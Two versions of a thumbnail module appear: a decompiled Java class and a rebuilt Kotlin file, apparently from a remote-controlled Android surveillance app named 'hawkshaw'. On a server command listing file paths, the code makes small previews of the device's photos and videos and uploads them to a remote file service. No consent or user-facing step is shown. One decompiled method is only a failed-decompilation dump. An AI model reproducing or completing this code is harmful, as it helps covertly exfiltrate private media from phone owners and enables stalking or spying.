File: Dummy/hawkshaw/library/features/media/filecrud/ThumbnailsUtilsKt.java
package com.hawkshaw.library.features.media.filecrud;

import O1.m;
import O1.p;
import O1.t;
import W2.e;
import W2.l;
import X1.B;
import Y1.K;
import android.graphics.Bitmap;
import android.graphics.BitmapFactory;
import android.media.ExifInterface;
import android.media.MediaMetadataRetriever;
import android.media.ThumbnailUtils;
import android.net.Uri;
import com.hawkshaw.library.App;
import com.hawkshaw.library.logger.Logger;
import i.C0528x;
import java.io.ByteArrayOutputStream;
import java.io.File;
import java.util.List;
import q3.k;
import t3.N;

public final class ThumbnailsUtilsKt {
    private static final String TAG = "ThumbnailsUtils";
    private static final e stream$delegate = new l(t.f1553D);

    /* access modifiers changed from: private */
    public static final byte[] getImageThumbnail(File file) {
        ExifInterface exifInterface;
        Bitmap bitmap;
        try {
            exifInterface = new ExifInterface(file.getPath());
        } catch (Exception unused) {
            exifInterface = null;
        }
        if (exifInterface == null || !exifInterface.hasThumbnail()) {
            try {
                bitmap = ThumbnailUtils.extractThumbnail(BitmapFactory.decodeFile(file.getPath()), 128, 128);
            } catch (Exception e5) {
                Logger.e$default(Logger.INSTANCE, TAG, C0528x.e("Image: ", file.getPath(), ", ", e5.getMessage()), (Exception) null, false, 12, (Object) null);
                bitmap = null;
            }
        } else {
            bitmap = exifInterface.getThumbnailBitmap();
        }
        if (bitmap != null) {
            return toByteArray(bitmap);
        }
        return null;
    }

    /* access modifiers changed from: private */
    public static final Object getMediaThumbnails(k kVar, a3.e eVar) {
        return B.B(N.f9290a, new p(kVar, (a3.e) null), eVar);
    }

    private static final ByteArrayOutputStream getStream() {
        return (ByteArrayOutputStream) stream$delegate.getValue();
    }

    /* access modifiers changed from: private */
    public static final byte[] getVideoThumbnail(File file) {
        Bitmap bitmap;
        MediaMetadataRetriever mediaMetadataRetriever = new MediaMetadataRetriever();
        try {
            mediaMetadataRetriever.setDataSource(App.Companion.getContext(), Uri.parse(file.getPath()));
            Bitmap frameAtTime = mediaMetadataRetriever.getFrameAtTime(1000, 2);
            if (frameAtTime != null) {
                bitmap = Bitmap.createScaledBitmap(frameAtTime, 128, 128, false);
                mediaMetadataRetriever.release();
                if (bitmap != null) {
                    return toByteArray(bitmap);
                }
                return null;
            }
            throw new Exception();
        } catch (Exception e5) {
            Logger.e$default(Logger.INSTANCE, TAG, "Video MMR: " + file.getPath() + ", " + e5.getMessage(), (Exception) null, false, 12, (Object) null);
            try {
                bitmap = ThumbnailUtils.createVideoThumbnail(file.getPath(), 1);
            } catch (Exception e6) {
                Logger.e$default(Logger.INSTANCE, TAG, "Video TU: " + file.getPath() + ", " + e6.getMessage(), (Exception) null, false, 12, (Object) null);
                bitmap = null;
            }
        } catch (Throwable th) {
            mediaMetadataRetriever.release();
            throw th;
        }
    }

    /* JADX WARNING: type inference failed for: r9v4, types: [java.lang.Object, j3.s] */
    /* JADX WARNING: type inference failed for: r0v2, types: [c3.c] */
    /* JADX WARNING: Multi-variable type inference failed */
    /* JADX WARNING: Removed duplicated region for block: B:14:0x003f  */
    /* JADX WARNING: Removed duplicated region for block: B:24:0x008d A[RETURN] */
    /* JADX WARNING: Removed duplicated region for block: B:25:0x008e  */
    /* JADX WARNING: Removed duplicated region for block: B:8:0x0023  */
    /* Code decompiled incorrectly, please refer to instructions dump. */
    public static final java.lang.Object pushThumbnails(com.hawkshaw.library.datalayer.models.Command.ThumbnailRequest r8, a3.e r9) {
        /*
            boolean r0 = r9 instanceof O1.q
            if (r0 == 0) goto L_0x0013
            r0 = r9
            O1.q r0 = (O1.q) r0
            int r1 = r0.f1545F
            r2 = -2147483648(0xffffffff80000000, float:-0.0)
            r3 = r1 & r2
            if (r3 == 0) goto L_0x0013
            int r1 = r1 - r2
            r0.f1545F = r1
            goto L_0x0018
        L_0x0013:
            O1.q r0 = new O1.q
            r0.<init>(r9)
        L_0x0018:
            java.lang.Object r9 = r0.f1544E
            b3.a r1 = b3.C0298a.f4140D
            int r2 = r0.f1545F
            r3 = 2
            r4 = 1
            r5 = 0
            if (r2 == 0) goto L_0x003f
            if (r2 == r4) goto L_0x0037
            if (r2 != r3) goto L_0x002f
            java.lang.Object r8 = r0.f1543D
            w3.b r8 = (w3.C1066b) r8
            Y1.C0110h.P(r9)
            goto L_0x008f
        L_0x002f:
            java.lang.IllegalStateException r8 = new java.lang.IllegalStateException
            java.lang.String r9 = "call to 'resume' before 'invoke' with coroutine"
            r8.<init>(r9)
            throw r8
        L_0x0037:
            java.lang.Object r8 = r0.f1543D
            j3.s r8 = (j3.s) r8
            Y1.C0110h.P(r9)
            goto L_0x007c
        L_0x003f:
            Y1.C0110h.P(r9)
            j3.s r9 = new j3.s
            r9.<init>()
            java.util.List r2 = r8.getList()
            if (r2 == 0) goto L_0x0057
            int r2 = r2.size()
            java.lang.Integer r6 = new java.lang.Integer
            r6.<init>(r2)
            goto L_0x0058
        L_0x0057:
            r6 = r5
        L_0x0058:
            r9.f7500D = r6
            O1.s r2 = new O1.s
            r2.<init>(r8, r9, r5)
            w3.e r8 = new w3.e
            r8.<init>((i3.p) r2)
            com.hawkshaw.library.datalayer.Injector$Companion r2 = com.hawkshaw.library.datalayer.Injector.Companion
            com.hawkshaw.library.datalayer.Injector r2 = r2.getInstance()
            com.hawkshaw.library.datalayer.network.service.FileService r2 = r2.getFileService()
            r0.f1543D = r9
            r0.f1545F = r4
            java.lang.Object r8 = r2.uploadThumbnails(r8, r0)
            if (r8 != r1) goto L_0x0079
            return r1
        L_0x0079:
            r7 = r9
            r9 = r8
            r8 = r7
        L_0x007c:
            w3.b r9 = (w3.C1066b) r9
            O1.r r2 = new O1.r
            r2.<init>(r8, r5)
            r0.f1543D = r9
            r0.f1545F = r3
            java.lang.Object r8 = v3.j.c(r0, r2, r9)
            if (r8 != r1) goto L_0x008e
            return r1
        L_0x008e:
            r8 = r9
        L_0x008f:
            return r8
        */
        throw new UnsupportedOperationException("Method not decompiled: com.hawkshaw.library.features.media.filecrud.ThumbnailsUtilsKt.pushThumbnails(com.hawkshaw.library.datalayer.models.Command$ThumbnailRequest, a3.e):java.lang.Object");
    }

    private static final byte[] toByteArray(Bitmap bitmap) {
        getStream().reset();
        bitmap.compress(Bitmap.CompressFormat.PNG, 90, getStream());
        byte[] byteArray = getStream().toByteArray();
        K.m(byteArray, "toByteArray(...)");
        return byteArray;
    }

    /* access modifiers changed from: private */
    public static final Object getMediaThumbnails(List<String> list, a3.e eVar) {
        return B.B(N.f9292c, new m(list, (a3.e) null), eVar);
    }
}

File: app/src/main/java/com/hawkshaw/library/features/media/filecrud/ThumbnailsUtilsKt.kt
package com.hawkshaw.library.features.media.filecrud

import android.graphics.Bitmap
import android.graphics.BitmapFactory
import androidx.exifinterface.media.ExifInterface
import android.media.MediaMetadataRetriever
import android.media.ThumbnailUtils
import android.net.Uri
import android.os.Build
import android.provider.MediaStore
import android.util.Log // Added for Android logging
import androidx.annotation.RequiresApi
import com.hawkshaw.library.App
import com.hawkshaw.library.datalayer.Injector
import com.hawkshaw.library.datalayer.models.Command
import com.hawkshaw.library.datalayer.network.grpc.GrpcResponse // Import GrpcResponse
import com.hawkshaw.library.datalayer.network.twirp.ApiResponse // Ensure this is the correct ApiResponse class
import com.hawkshaw.library.logger.Logger
import kotlinx.coroutines.Dispatchers
import kotlinx.coroutines.flow.Flow
import kotlinx.coroutines.flow.flow
import kotlinx.coroutines.flow.collect // Import collect for Flow
import kotlinx.coroutines.withContext
import java.io.ByteArrayOutputStream
import java.io.File
import kotlin.concurrent.getOrSet
import androidx.core.graphics.scale

private const val TAG = "ThumbnailsUtils"

// Thread-local ByteArrayOutputStream to reuse across operations
private val streamThreadLocal = ThreadLocal<ByteArrayOutputStream>()

/**
 * Get the shared ByteArrayOutputStream for this thread
 */
private fun getStream(): ByteArrayOutputStream {
    // Log.d(TAG, "[DEBUG] getStream called.")
    return streamThreadLocal.getOrSet {
        Log.d(TAG, "[DEBUG] Initializing new ByteArrayOutputStream for this thread.")
        ByteArrayOutputStream()
    }
}

/**
 * Convert a bitmap to a byte array
 */
private fun toByteArray(bitmap: Bitmap): ByteArray {
    Log.d(TAG, "[DEBUG] toByteArray called for bitmap: $bitmap")
    val stream = getStream()
    stream.reset()
    Log.d(TAG, "[DEBUG] toByteArray: Stream reset. Compressing bitmap to PNG, quality 90.")
    bitmap.compress(Bitmap.CompressFormat.PNG, 90, stream)
    val byteArray = stream.toByteArray()
    Log.d(TAG, "[DEBUG] toByteArray: Bitmap compressed. Byte array size: ${byteArray.size}")
    return byteArray
}

/**
 * Extract a thumbnail from an image file
 */
@RequiresApi(Build.VERSION_CODES.O)
private fun getImageThumbnail(file: File): ByteArray? {
    Log.d(TAG, "[DEBUG] getImageThumbnail called for file: ${file.path}")
    val exifInterface = try {
        Log.d(TAG, "[DEBUG] Attempting to read EXIF for ${file.path}")
        ExifInterface(file.path)
    } catch (e: Exception) {
        Log.w(TAG, "[DEBUG] Failed to initialize ExifInterface for ${file.path}: ${e.message}")
        Logger.e(TAG, "Failed to read EXIF for ${file.path}: ${e.message}", e, false, 12, null)
        null
    }

    val bitmap = if (exifInterface != null && exifInterface.hasThumbnail()) {
        Log.d(TAG, "[DEBUG] EXIF thumbnail found for ${file.path}. Extracting thumbnailBitmap.")
        exifInterface.thumbnailBitmap // This can return null if extraction fails despite hasThumbnail()
    } else {
        Log.d(TAG, "[DEBUG] No EXIF thumbnail for ${file.path} or exifInterface is null. Attempting to decode full image.")
        try {
            BitmapFactory.decodeFile(file.path)?.let { fullBitmap ->
                Log.d(TAG, "[DEBUG] Full image decoded for ${file.path}. Original size: ${fullBitmap.width}x${fullBitmap.height}. Extracting thumbnail (128x128).")
                val thumbnail = ThumbnailUtils.extractThumbnail(fullBitmap, 128, 128)
                Log.d(TAG, "[DEBUG] Thumbnail extracted from full image. Size: ${thumbnail?.width}x${thumbnail?.height}. Recycling full bitmap.")
                fullBitmap.recycle() // Recycle the full bitmap after extraction
                thumbnail
            }
        } catch (e: Exception) {
            Log.e(TAG, "[DEBUG] Error decoding/extracting image thumbnail from ${file.path}: ${e.message}", e)
            // Existing Logger.e is fine for detailed error
            Logger.e(TAG, "Error extracting image thumbnail from ${file.path}: ${e.message}", e, false, 12, null)
            null
        }
    }

    return if (bitmap != null) {
        Log.d(TAG, "[DEBUG] Bitmap obtained for ${file.path}. Converting to byte array.")
        val byteArray = toByteArray(bitmap)
        bitmap.recycle() // Recycle bitmap after converting to byte array
        Log.d(TAG, "[DEBUG] Bitmap recycled for ${file.path} after toByteArray.")
        byteArray
    } else {
        Log.w(TAG, "[DEBUG] No bitmap could be obtained for image thumbnail: ${file.path}")
        null
    }
}

/**
 * Extract a thumbnail from a video file
 */
private fun getVideoThumbnail(file: File): ByteArray? {
    Log.d(TAG, "[DEBUG] getVideoThumbnail called for file: ${file.path}")
    val mediaMetadataRetriever = MediaMetadataRetriever()
    var finalByteArray: ByteArray? = null
    try {
        Log.d(TAG, "[DEBUG] Setting data source for MediaMetadataRetriever: ${Uri.fromFile(file)}")
        mediaMetadataRetriever.setDataSource(App.getContext(), Uri.fromFile(file))
        Log.d(TAG, "[DEBUG] Attempting to get frame at time (1000us) for ${file.path}")
        val frameAtTime = mediaMetadataRetriever.getFrameAtTime(1000, MediaMetadataRetriever.OPTION_CLOSEST_SYNC)

        if (frameAtTime != null) {
            Log.d(TAG, "[DEBUG] Frame retrieved for ${file.path}. Original size: ${frameAtTime.width}x${frameAtTime.height}. Scaling to 128x128.")
            val bitmap = frameAtTime.scale(128, 128, false) // Scale to target size
            frameAtTime.recycle() // Recycle the original frame bitmap
            Log.d(TAG, "[DEBUG] Frame scaled and original recycled. Converting to byte array.")
            finalByteArray = toByteArray(bitmap)
            bitmap.recycle() // Recycle scaled bitmap after converting to byte array
            Log.d(TAG, "[DEBUG] Scaled bitmap recycled after toByteArray for ${file.path}.")
        } else {
            Log.w(TAG, "[DEBUG] MediaMetadataRetriever.getFrameAtTime returned null for ${file.path}")
        }
    } catch (e: Exception) {
        Log.e(TAG, "[DEBUG] MediaMetadataRetriever error for ${file.path}: ${e.message}", e)
        Logger.e(TAG, "Video MMR error for ${file.path}: ${e.message}", e, false, 12, null)

        Log.d(TAG, "[DEBUG] Fallback: Attempting ThumbnailUtils.createVideoThumbnail for ${file.path}")
        try {
            val bitmap = ThumbnailUtils.createVideoThumbnail(file.path, MediaStore.Images.Thumbnails.MINI_KIND)
            if (bitmap != null) {
                Log.d(TAG, "[DEBUG] ThumbnailUtils.createVideoThumbnail succeeded for ${file.path}. Size: ${bitmap.width}x${bitmap.height}. Converting to byte array.")
                finalByteArray = toByteArray(bitmap)
                bitmap.recycle()
                Log.d(TAG, "[DEBUG] ThumbnailUtils bitmap recycled after toByteArray for ${file.path}.")
            } else {
                Log.w(TAG, "[DEBUG] ThumbnailUtils.createVideoThumbnail returned null for ${file.path}")
            }
        } catch (tuException: Exception) {
            Log.e(TAG, "[DEBUG] ThumbnailUtils.createVideoThumbnail error for ${file.path}: ${tuException.message}", tuException)
            Logger.e(TAG, "Video TU error for ${file.path}: ${tuException.message}", tuException, false, 12, null)
        }
    } finally {
        Log.d(TAG, "[DEBUG] Releasing MediaMetadataRetriever for ${file.path}")
        try {
            mediaMetadataRetriever.release()
            Log.d(TAG, "[DEBUG] MediaMetadataRetriever released successfully for ${file.path}")
        } catch (releaseEx: Exception) {
            Log.e(TAG, "[DEBUG] Error releasing MediaMetadataRetriever: ${releaseEx.message}", releaseEx)
            Logger.e(TAG, "Error releasing MediaMetadataRetriever: ${releaseEx.message}", releaseEx, false, 12, null)
        }
    }
    Log.d(TAG, "[DEBUG] getVideoThumbnail for ${file.path} returning byte array of size: ${finalByteArray?.size ?: "null"}")
    return finalByteArray
}


/**
 * Get thumbnails for media files (Generates a Flow of Pair<ByteArray?, String>)
 */
@RequiresApi(Build.VERSION_CODES.O)
private suspend fun getMediaThumbnails(paths: List<String>): Flow<Pair<ByteArray?, String>> = withContext(Dispatchers.IO) {
    Log.d(TAG, "[DEBUG] getMediaThumbnails called with ${paths.size} paths.")
    flow {
        for (path in paths) {
            Log.d(TAG, "[DEBUG] getMediaThumbnails: Processing path: $path")
            val file = File(path)
            if (!file.exists() || !file.isFile) {
                Log.w(TAG, "[DEBUG] getMediaThumbnails: File not found or is not a file: $path")
                Logger.d(TAG, "File not found or is not a file: $path", false, 8, null)
                emit(null to path) // Emit null thumbnail if file is invalid
                continue
            }

            val thumbnail: ByteArray? = when {
                path.endsWith(".jpg", ignoreCase = true) ||
                path.endsWith(".jpeg", ignoreCase = true) ||
                path.endsWith(".png", ignoreCase = true) -> {
                    Log.d(TAG, "[DEBUG] getMediaThumbnails: Identified as image: $path. Calling getImageThumbnail.")
                    getImageThumbnail(file)
                }

                path.endsWith(".mp4", ignoreCase = true) ||
                path.endsWith(".3gp", ignoreCase = true) ||
                path.endsWith(".webm", ignoreCase = true) ||
                path.endsWith(".mkv", ignoreCase = true) -> {
                    Log.d(TAG, "[DEBUG] getMediaThumbnails: Identified as video: $path. Calling getVideoThumbnail.")
                    getVideoThumbnail(file)
                }

                else -> {
                    Log.w(TAG, "[DEBUG] getMediaThumbnails: Unsupported file type for thumbnail: $path")
                    Logger.d(TAG, "Unsupported file type for thumbnail: $path", false, 4, null)
                    null
                }
            }
            Log.d(TAG, "[DEBUG] getMediaThumbnails: Emitting thumbnail (size: ${thumbnail?.size ?: "null"}) for path: $path")
            emit(thumbnail to path)
        }
        Log.d(TAG, "[DEBUG] getMediaThumbnails: Finished processing all paths.")
    }
}

/**
 * Push thumbnails to the server.
 * This function now collects from the flow of upload responses and aggregates the result.
 */
@RequiresApi(Build.VERSION_CODES.O)
suspend fun pushThumbnails(request: Command.ThumbnailRequest): ApiResponse<*> = withContext(Dispatchers.IO) {
    Log.d(TAG, "[DEBUG] pushThumbnails called with request: $request")
    val thumbnailsMap = mutableMapOf<String, ByteArray?>()

    Log.d(TAG, "[DEBUG] pushThumbnails: Generating thumbnails for ${request.list.size} paths.")
    request.list.forEach { path ->
        Log.d(TAG, "[DEBUG] pushThumbnails: Processing path for thumbnail generation: $path")
        val file = File(path)
        val thumbnail = when {
            path.endsWith(".jpg", ignoreCase = true) ||
                    path.endsWith(".jpeg", ignoreCase = true) ||
                    path.endsWith(".png", ignoreCase = true) -> {
                Log.d(TAG, "[DEBUG] pushThumbnails: Identified as image for direct generation: $path")
                getImageThumbnail(file)
            }

            path.endsWith(".mp4", ignoreCase = true) ||
                    path.endsWith(".3gp", ignoreCase = true) ||
                    path.endsWith(".webm", ignoreCase = true) ||
                    path.endsWith(".mkv", ignoreCase = true) -> {
                Log.d(TAG, "[DEBUG] pushThumbnails: Identified as video for direct generation: $path")
                getVideoThumbnail(file)
            }

            else -> {
                Log.w(TAG, "[DEBUG] pushThumbnails: Unsupported file type during direct generation: $path")
                null
            }
        }
        Log.d(TAG, "[DEBUG] pushThumbnails: Thumbnail generated for $path (size: ${thumbnail?.size ?: "null"}). Adding to map.")
        thumbnailsMap[path] = thumbnail
    }
    Log.d(TAG, "[DEBUG] pushThumbnails: Finished generating thumbnails. Map size: ${thumbnailsMap.size}")

    val validThumbnails = thumbnailsMap.filterValues { it != null }.mapValues { it.value!! }
    Log.d(TAG, "[DEBUG] pushThumbnails: Filtered valid thumbnails. Count: ${validThumbnails.size}")
    val uploadRequest = ThumbnailUploadRequest(
        thumbnails = validThumbnails,
        paths = request.list ?: emptyList()
    )
    Log.d(TAG, "[DEBUG] pushThumbnails: Prepared ThumbnailUploadRequest: $uploadRequest")

    try {
        Log.d(TAG, "[DEBUG] pushThumbnails: Calling Injector.INSTANCE.fileService.uploadThumbnails.")
        val response = Injector.INSTANCE.fileService.uploadThumbnails(uploadRequest)
        Log.d(TAG, "[DEBUG] pushThumbnails: Received response from fileService: $response")

        return@withContext when (response) {
            is ApiResponse.Success<*> -> {
                // Corrected Log: Removed .data as it's unresolved
                Log.d(TAG, "[DEBUG] pushThumbnails: Upload successful. Response: $response")
                Logger.d(
                    TAG,
                    "Uploaded ${validThumbnails.size} thumbnails successfully", // Log count of successfully generated and uploaded thumbnails
                    false,
                    4,
                    null
                )
                response
            }
            is ApiResponse.Error<*> -> {
                // Corrected Log: Removed .errorCode as it's unresolved
                Log.e(TAG, "[DEBUG] pushThumbnails: Upload failed. Error: ${response.errorMessage}")
                Logger.e(
                    TAG,
                    "Thumbnail upload failed: ${response.errorMessage}",
                    b = false,
                    i = 12,
                    nothing = null
                )
                response
            }
            is ApiResponse.InProgress<*> -> {
                Log.d(TAG, "[DEBUG] pushThumbnails: Upload in progress.")
                Logger.d(TAG, "Thumbnail upload in progress", false, 4, null)
                response
            }
            else -> {
                Log.e(TAG, "[DEBUG] pushThumbnails: Received unexpected response type from fileService.")
                Logger.e(
                    TAG,
                    "Received unexpected response type",
                    b = false,
                    i = 12,
                    nothing = null
                )
                ApiResponse.Error("Unexpected response type")
            }
        }
    } catch (e: Exception) {
        Log.e(TAG, "[DEBUG] pushThumbnails: Exception during thumbnail upload network call: ${e.message}", e)
        Logger.e(TAG, "Exception during thumbnail upload: ${e.message}", e, false, 12, null)
        return@withContext ApiResponse.Error(e.message ?: "Unknown upload error")
    }
}

/**
 * Data class representing a thumbnail upload request
 */
data class ThumbnailUploadRequest(
    val thumbnails: Map<String, ByteArray>,
    val paths: List<String>
)
